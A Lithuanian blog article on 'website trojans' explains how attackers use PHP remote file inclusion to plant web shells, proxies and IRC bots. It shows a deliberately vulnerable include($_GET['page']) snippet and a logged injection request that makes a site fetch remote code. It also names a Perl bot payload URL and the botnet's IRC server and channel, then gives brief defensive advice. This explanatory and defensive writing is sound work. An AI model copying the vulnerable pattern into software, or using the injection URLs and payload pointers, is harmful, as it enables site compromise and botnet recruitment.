Svetainių trojanai

Kol kas Lietuvoje apie tai turbūt mažai kas girdėjot, netgi informacijos nepakankamai. Tačiau šio tipo trojanų aktyvumas prasidėjo jau nuo 2005m.
Svetainių kūrėjai (programuotojai) dažnai aplaidžiai žiūri į vartotojo įvedamą informaciją (kintamuosius) ir beveik visada tai būna lemtinga klaida. Pasinaudodami XSS „standartinėmis“ spragomis „bomžai“ mėgina įsibrauti į jūsų svetainę ir jei jiems tai pavyksta užkrečia jūsų puslapį trojanu - kuris atlieka lygiai tokį pat juodą darbą.

Pirmiausia pakalbėkime apie pačius www trojanus ir jų tipus.
Daugiausiai tokie trojanai yra megėjiški. Bomžai viską atlieka rankutėmis. Pirmiausia aptinka/suranda kokios populiarios turinio valdymo sistemos spragą, pasileidžia google.com puslapį, susiranda tokių svetainių aibę ir maigydami klavišus nulaužinėja (*defeisina) svetaines. Po tokių operacijų, jie paprastai palieka svetainėje trojaną, kurio pagalba vėliau, kad ir po svetainės atstatymo gali vėl sėkmingai prisijungti prie valdymo (phpshell). Tokio lygio bomžai paprastai dar vadinami - exploitų vaikais, scriptvaikiais. Arba tiesiog „snargliais“.

Antros rūšies *bomžai smirdi kurkas toliau. Jų darbas/tikslas šiektiek labiau „apšikti“ interneto kampelius. Paprastai tokie dykaduoniai įsibrovę į svetimą svetainę labai neišsivaizdina (ne *defeisina). Dažniausiai jie paverčia tokį saitą savo vergu. Patupdo į jį proxy (php vartus) pro kuriuos jie vėliau rengia kitas atakas ne savo IP adresu. Rengia įvairias atakas prieš kitus serverius, kitas svetaines. Dažnai net priima užsakymus („užlengti“). Esant reikalui pavogia ir visą hostingą - pakeisdami visus slaptažodžius, kurį vėliau greituoju būdu dar ir sugeba išparduoti.

Na ir labiausiai smirdantys *bomžai, nuo kurių tos smarvės net akis graužia ir dėl kurių esi priverstas vargti ne vieną naktį siekiant užtikrinti savo svetainės saugumą. Tokie smirdaliai dirba nevieni. Beveik visada buriuojasi grupėmis (kaip laukiniai utėlėti skalikai). Va čia ir prasideda margumynas įvairiausių trojano tupdymo būdų. Šiuo metu pavojingiausias (asmeninė statistika) svetainių tipo trojanas veikia IRC pagrindu. Kodėl baisiausias? Užkrėsta svetainė tiesiog prisijungia prie IRC serverio, tam tikrą kanalą ir tyliai sėdėdami klauso tolimesnių bomžų komandų. Tos komandos tai paprastai DosS atakos, įvairūs floodai, portų skanavimai ir taip toliau. Taip šie botai/svetainės kiek supratau automatiškai atlieka panašių į save svetainių paiešką ir tokiu pat būdu įsiskiepija ir į kitas svetaines.

Kaip svetainės užsikrečia?

Dažniausias, būdas tai per nuorodas. pvz: index.php?ir=http://www.chv.ro Užklausų būna įvairiausių, p=http://www.bomzo.kodo.nuoroda ir panašiai. Dauguma svetainių savo index.php faile tiesiog naudoja paprasčiausią būdą skirtingiems puslapiams užkrauti:

    <?php
       if (isset($_GET['page'])) { include($_GET['page']); }
    ?> 


Tai tiesiog absurdiška. Tokią pačią nesąmonę kadaise turėjo ir www.policija.lt svetainė. Tuo metu išplito nuorodos su tituliniame puslapyje įterptomis gėjų fotografijomis, ko pasekoje be abejo buvo ištaisyta ši spraga. Baisu net pagalvoti, kas butų jei pamėgintų tokiu būdu įterpti trojaną (visa informacija, tame tarpe visi duomenys butų prieinami bomžui).

Kaip apsisaugoti?

Pirmiausia užtikrinkite ar išties kreipiamasi į jūsų sąraše/svetainėje esantį failą, prirašykite daugiau sąlygų, patikrinkite įvedamų duomenų tipą. Būkite tiesiog labiau paranojiški.

Pavyzdys

Panagrinėkime trumpai vieną tokio trojano pavyzdį.
Jeigu žinoma dar jums neatsibodo skaityti. Aš kaip ir visados galiu klysti, tada skaitydami toliau neimkit viską kaip už gryną pinigą, nesu tiek kompetetingas analizuoti tokias „nesąmones“. Taigi išnarpliokime vieną iš pavojingesnių atakų nukreiptų prieš Atviras Kodas Lietuvai svetainę.
Esu padaręs neaiškių mėginimų nulaužti svetainę registrą, bei automatinį baninimą. Štai panašaus turinio laiškus gaunu paštu pastoviai:

attack injection in /index.php
hain: ir=http://www.chv.ro/cache/0day
--
from: (ip-forw-RA):-  -  - 70.84.36.228

Pirmoje eilutėje rašomas puslapio failas į kurį kreipėsi trojanas/bomžas.
Antroje eilutėje užklausa kurios pagalba mėgino prasmukti į svetainę.
O ketvirtoje eilutėje IP adresas.

Eikime tiesiai adresu kurį mums mėgino prakišti: čia jo turinys. Kodas išties sudėtingas, tačiau esmė aiški. Vos tik šis kodas papuola į aukos svetainę per nuorodą, vykdomas trojano įkėlimo procesas. Daromos atsarginės kopijos ir apie sėkmingą įkėlimą pranešama bomžams. 37 eilutėje matome kitų nuorodų, kuri veda mus į http://www.freewebtown.com/sclip/evil.txt (jei neveiktų čia jo turinys). Kaip matote čia jau PERL skriptas. O jo esmė jau iš konteksto turėtų aiškėti. Prisijungiama prie IRC serverio irc.djflopa.biz į kanalą ##.0.##. Jame sėdi bomžai su savo vergais. Man pavyko prisijungti su paprastu mIRC klientu („pokalbio“ logas ). Šalia bomžų dar buvo apie 80 užkrėstų svetainių su sugeneruotais „nickais“. Iš kodo matosi, kad bomžai pasivadinę slapyvardžiais: Sclipici, anakin, evil, lamer2k Tuo metu nebuvo Sclipici bomželio. Pabandžiau apsimesti vienu iš užkrėstu svetainių, toki atveju matytum jų juodą darbą ir galėtum tinkamai pasiruošti ar perspėti atitinkamas instancijas. Reikėtų išsiųsti smagų laišką ir ši nesamonė bent kiek būtų pristabdyta. Kol kas tegul vaikučiai pažaidžia.

Netgi flash animacija, video ar žaidimai nėra saugūs.
Žiūrėdami ar žaizdami bomžų paruoštus flash žaidimus/video, jūs nejauzdami automatiškai atliekate jų specialiai suprogramuotą juodą darbą su savo IP adresu. Skenuojate portus, eksploitinate kitas svetaines.


Sutartiniai terminai:

  • Bomžas - internetinis hackeris (programišius), kuris mėgsta kuistis po svetimas šiukšles.
  • defeisinimas - nulaužtos svetainės pagrindinio puslapio pakeitimas į savo pranešimą - „egzibicionizmo išraiška“.
Pagal www.mrcbug.com
Užkrėstų arba virusus platinančių svetainių sąrašas: http://www.malwaredomainlist.com/mdl.php

Discussion


Fatal error: Call to undefined function isvalidemail() in /home/ammber/domains/coders.lt/public_html/lib/plugins/avatar/helper.php on line 95